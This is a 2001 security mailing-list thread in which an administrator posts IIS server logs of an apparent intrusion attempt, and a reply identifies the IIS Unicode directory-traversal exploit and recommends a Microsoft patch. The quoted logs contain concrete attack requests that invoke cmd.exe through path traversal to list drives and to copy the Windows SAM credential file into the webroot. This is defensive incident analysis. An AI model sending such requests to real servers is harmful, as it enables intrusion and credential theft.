Security Incidents mailing list archives
Re: IIS Unicode attack decode
From: "Portnoy, Gary" <gportnoy () BELENOSINC COM>
Date: Tue, 20 Mar 2001 12:57:15 -0500
Robert, This indeed is the IIS Unicode exploit. Looks like an automatic tool based on the quick succession of the requests initially, but then they slow down, and the attacker has to stop and think, as things don't go exactly as he planned. Notice that some GET's returned the code of 200, meaning he was able to successfully obtain the directory structure of your c and d drives, as well as c:\winnt and some others. You also have an executable _vti_bin directory which signifies to the attacker that you have FrontPage installed. He could exploit some FrontPage vulnerabilities. You are right, he wasn't able to obtain sam._ from the repair directory due to permissions, but from what it looks like your webroot is on c drive, so he/she can now run any executable in winnt directory, unless IUSR_computername is denied access to them. That's all they need to turn your computer into a warez site as was detailed in postings by Ron Grove from 2/24/01 to the incidents list. That generated quite a discussion, so check it out... You probably need to load MS patch Q277873 http://www.microsoft.com/technet/security/bulletin/MS00-086.asp -Gary- Gary Portnoy Network Administrator gportnoy () belenosinc com PGP Fingerprint: 9D69 6A39 642D 78FD 207C 307D B37D E01A 2E89 9D2C
-----Original Message----- From: ROBERT DEMAIN [mailto:rdemain () RM COM] Sent: Tuesday, March 20, 2001 9:56 AM To: INCIDENTS () SECURITYFOCUS COM Subject: IIS Unicode attack decode Hello All, Recently i've been seeing quite a few attempts from the same russian IP trying to send unicode commands to a web server. These attacks were picked up by an IDS. Below are extracts from the log file on the web server (see below) My understanding of what has happened here is as follows: -attacker tries a few attempts at doing a dir listing of c: and d: -attacker tries to copy important stuff from the \repair directory to c:\inetpub\wwwroot (most unfriendly) -attacker tries to copy bitmap (Blue%20Lace%2016.bmp) - not sure what this is about Putting it all together it seems the attacker tried to use the iis4 and 5 unicode exploit to copy the sam file to a place where he/she/it thought they could get it from (on this server c:\inetpub\wwwroot is not the default web site or anything, but i believe it is on a default iis install). This failed for two main reasons; 1. the iusr_servername account (which is the user account this exploit can run as - correct me if i'm wrong) does not have permissions on \repair 2. the copy of the file to c:\inetpub\wwwroot would also fail as iusr_servername would not have the rights. Anyone have any comments on this? Anyone else seen activity like this? Regards Rob 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 HEAD /Default.htm - 200 Mozilla/3.0+(compatible) 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/3.0+(compatible) 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /cgi-shl/win-c-sample.exe - 404 Mozilla/3.0+(compatible) 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200 Mozilla/3.0+(compatible) 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /scripts/\/winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /scripts/\/winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:23:14 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:23:31 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:23:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\SOMETHINGOTDOWITHME%20WEB%20HOSTING 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:24:48 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\repair\sam._+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:25:10 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:25:15 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\winnt\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:25:42 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\winnt\repair\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:26:45 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\repair\sam+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:28:10 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:28:27 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:28:37 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:28:59 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:29:13 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\AdminScripts\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:29:31 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\wwwroot\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) Standard Disclaimer: This message is confidential. You should not copy it or disclose its contents to anyone. You may use and apply the information only for the intended purpose. Internet communications are not secure and therefore RM does not accept legal responsibility for the contents of this message. Any views or opinions presented are only those of the author and not those of RM. If this email has come to you in error please delete it and any attachments. Please note that RM may intercept incoming and outgoing e-mail communications.
Current thread:
- IIS Unicode attack decode ROBERT DEMAIN (Mar 20)
- Re: IIS Unicode attack decode Derek Kwan (Mar 20)
- <Possible follow-ups>
- Re: IIS Unicode attack decode Portnoy, Gary (Mar 20)
- Re: IIS Unicode attack decode ROBERT DEMAIN (Mar 20)